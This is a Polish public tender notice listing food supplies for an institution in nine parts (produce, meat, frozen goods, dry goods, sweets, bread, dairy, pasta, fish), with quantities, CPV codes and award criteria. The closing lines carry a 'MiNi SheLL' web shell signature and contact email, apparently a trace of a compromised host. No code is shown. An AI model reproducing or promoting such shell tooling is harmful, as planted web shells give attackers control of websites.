<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tabela  A  WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość  Marchew luzem kg 120 Pietruszka korzeń kg 50 Rzodkiewka świeża p. pęczek 120 Sałata  szt.120 Sałata lodowa szt.50 Por korzeń kg50 Cebula biała kg100 Buraki czerwone kg200 Seler korzeń kg 100 Jabłka lobo  kg200 Mandarynki  kg 80 Kiwi  szt. 300 Ziemniaki jadalne kg3000 Kapusta czerwona świeża  kg100 Kapusta pekińska  szt.70 Kalafior świeży  szt.50 Pomidory luz kg  120 Ogórki szklarniowe kg 120 Seler naciowy pęczek 50 Ogórki kwaszone luz kg  150 Kapusta kwaszona kg150 Kapusta biała główka kg kg 200   Pieczarki świeże luz kg 40 Banan kg100 Papryka szt.40 truskawki kg60 Szczypior pęczek 100 Koper świeży pęczek 100 Natka pietruszki p. pęczek 100 Winogrono jasne kg100 cytryna kg 50..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Tabela B  MIĘSO I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Ilość Ogonówka wieprzowa wędzona  kg150 Boczek wędzony wieprz. B k kg 60 Parówka gruba wieprzowa 30%tł. kg200 Szynka wieprzowa wędzona got. kg100 Mięso wieprzowe mielone drobne kg200 Kiełbasa żywiecka kg100 Mięso gulaszowe wieprzowe kg200 Filet drobiowy z kurczaka kg150 Żeberka wieprzowe kg 100 Porcje rosołowe z kurczaka kg150 Kiełbasa wieprzowa szynkowa kg250 Udka z kurczaka kg150 Karkówka b k wieprzowa kg 150 Kaszanka kg 100 Kurczak świeży patroszony do 2kg kg150 Wątróbka wieprzowa kg100 Parówka drobiowa cienka kg200 Kotlet schabowy b k kg150 Pasztet drobiowy kg100 Smalec luz kg50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.00.00-6, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tabela C  MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Fasolka szparagowa mrożona 2,5 kg op. szt.130 Truskawki mrożone  2,5  kg op.. szt.150 Mieszanka warzywna paski 2,5  kg op. szt.150 Brokuły mrożone 2,5  kg op.szt.	80 Zupa pieczarkowa, 2,5  kg op.szt.100 Zupa kalafiorowa, 2,5  kg op.szt.160 Zupa jarzynowa, 2,5  kg op. szt.	160 Kalafior 2,5  kg op. szt.120 Pyzy drożdżowe op.9szt szt.420 Groszek zielony  2,5  kg op. szt.100 Szpinak mrożony 2,5  kg op. szt50 Marchew z groszkiem, 2,5  kg op. szt.100 Wiśnie drążone 2,5  kg op. szt.40 Maliny 2,5 kg szt.10 Jagody 2,5 kg szt.10 Kompotowe 2,5kg op. szt. 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Tabela D   PRZETWORY MĄCZNE, INNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Mąka pszenna 500  kg 125 Mąka razowa  kg 125 Ryż długoziarnisty  kg 100 Ryż ciemny kg  50 Kawa zbożowa (typu inka)150 g szt 30 Kasza jęczmienna średnia luz kg 30 Kasza jaglana kg 60 Kasza kuskus kg 60 Kasza gryczana	kg 60 Kasza manna 1kg kg 30 Kisiel różne smaki 40 g	szt. 300 Budyń różne smaki 40 g szt.300 Fasola czerwona konserwowa 450g op. szt.50 Cukier biały kryształ, paczkowany 1kg szt.500 Miód pszczeli nektarowy lipowy 0,4 kg	szt. 100 Dżemy różne smaki 0,30 wysokosłodzony szt.80 Kakao naturalne 150 g op. szt.10 Majonez dekoracyjny 0,7 kg op.  szt.50 Musztarda sarepska 0,9 kg op.	szt.20 Płatki owsiane 0,5 kg op. szt.50 Groch połówki luz  kg 50 Fasola sucha luz  kg 40 Koncentrat  pomidorowy 30% 0,9 l  szt.50 Galaretka do ciast różne smaki  0,75g szt.  240 Proszek do pieczenia 18g szt.50 Drożdże piekarskie 100g szt.70 Ketchup łagodny 500g	szt. 60 Ocet spirytusowy 10%, 0,5l szt.30 Sól 1kg szt.80 Sól niskosodowa 350 g szt.100 Liść laurowy 10g szt.30 Cukier waniliowy 32g szt.60 Cukier puder 0,5kg szt.40 Kwasek cytrynowy spożywczy 20g szt.40 Rodzynki 200g szt.10 Ananas puszka plastry, 0,58 kg	szt.50 Brzoskwinia puszka połówki, 850dkg szt.50 Kukurydza konserwowa 400 ml szt.50 Groszek zielony puszka 400ml	szt.40 Przecier ogórkowy 0,5 kg op. szt.50 Cynamon 20 g szt.40 Ziele angielskie 15g szt.80 Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l  szt.200 Tuńczyk puszka  170g op. szt.60 sardynka 135g op. szt.80 Pasztet drobiowy 131g op. szt.  100 Woda niegazowana mineralna 5l  szt. 300 Imbir 20 g szt 60 Czosnek granulowany 20 g szt. 60 Bazylia 10 g szt. 60 Oregano 10 g szt. 60 herbaty ziołowe 4x30 g - 20 torebek szt. 60 zioła prowasalskie 10 g szt.  60 Herbata granulowana 100g op. szt.140 Papryka słodka syp. 0,5kg szt.60 Pieprz mielony 0,5 kg szt.60 Lubczyk 0,5 kg szt.20 Rozmaryn 0,5 kg szt 20 Ziarno kminku 0,5 kg szt.20 Ziarno sezamu 0,5 kg szt.20 Tymianek  0,5 kg szt.20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Tabela E   SŁODYCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op.szt 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 36 szt op display szt. 10 Wafle kakaowe  b czekolady (typu:Grześki) 36 szt op display szt. 20 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 100 Draże różne smaki 70 g szt. 280 Figurki czekoladowe - Zajączki 80g szt. 300 Jaja czekoladowe szt. 300 Wafle śmietankowe luz kg30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Tabela F  PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Ilość Chleb baltonowski 0,6 kg krojony szt.1600 Chleb razowy 0,5 kg litewski krojony o niskiej zawartości sodu szt.800 Bułka firmowa  0,06 kg szt. 3500 Bułka grahamka szt. 2500 Chleb pszenny 0,35 kg szt. 600 Bułka tarta 1 kg szt. 40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Tabela G     NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l   szt.130 Śmietana zakwaszana 12% 180g szt.50 Twaróg półtłusty 250 g op. szt.600 Ser salami luz kg80 Sery topione bloczki 100g op. różne smaki szt. 50 Jajka kurze świeże średnie  szt.2000 Mleko 2,5% karton 1 l op.szt.1200 Ser kanapkowy 150g op.szt.150 Ser gouda kg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.200 Jogurt naturalny 0,45l op.szt.100 Jogurt smakowy 115g szt.1500 Śmietanka kremowa 30% 0,5l	szt. 30 Margaryna zwykła250g 	szt. 300 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Tabela H   MAKARONY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Majeranek 0,30kg op. szt. 30 Zupa żurek 1 kg. op. szt. 4 Makaron drobny gwiazdki 100% pszenicy Durum 5kg op. szt. 60 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 10 Makaron rurki 100% pszenicy Durum 5kg op. szt. 40 Makaron łazanki 100% pszenicy Durum 3kg op. szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 30 Makaron ciemny rurki100% pszenicy Durum 5kg op. kg 50 Soki owocowe 5l bez cukru szt. 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Tabela  I   RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa towaru Jednostka miary Ilość Ryby mrożone filet z Pangi kg op.kg300 Ryby mrożone filet z dorsza kg op.kg200 Paluszki rybne Kg60 Ryby wiadro płaty śledziowe ocet 2kgkg60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.10.00.00-9, 15.13.15.00-0, 15.33.11.00-8, 15.00.00.00-8, 15.84.00.00-8, 15.81.10.00-6, 15.51.10.00-3, 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5, 15.22.90.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com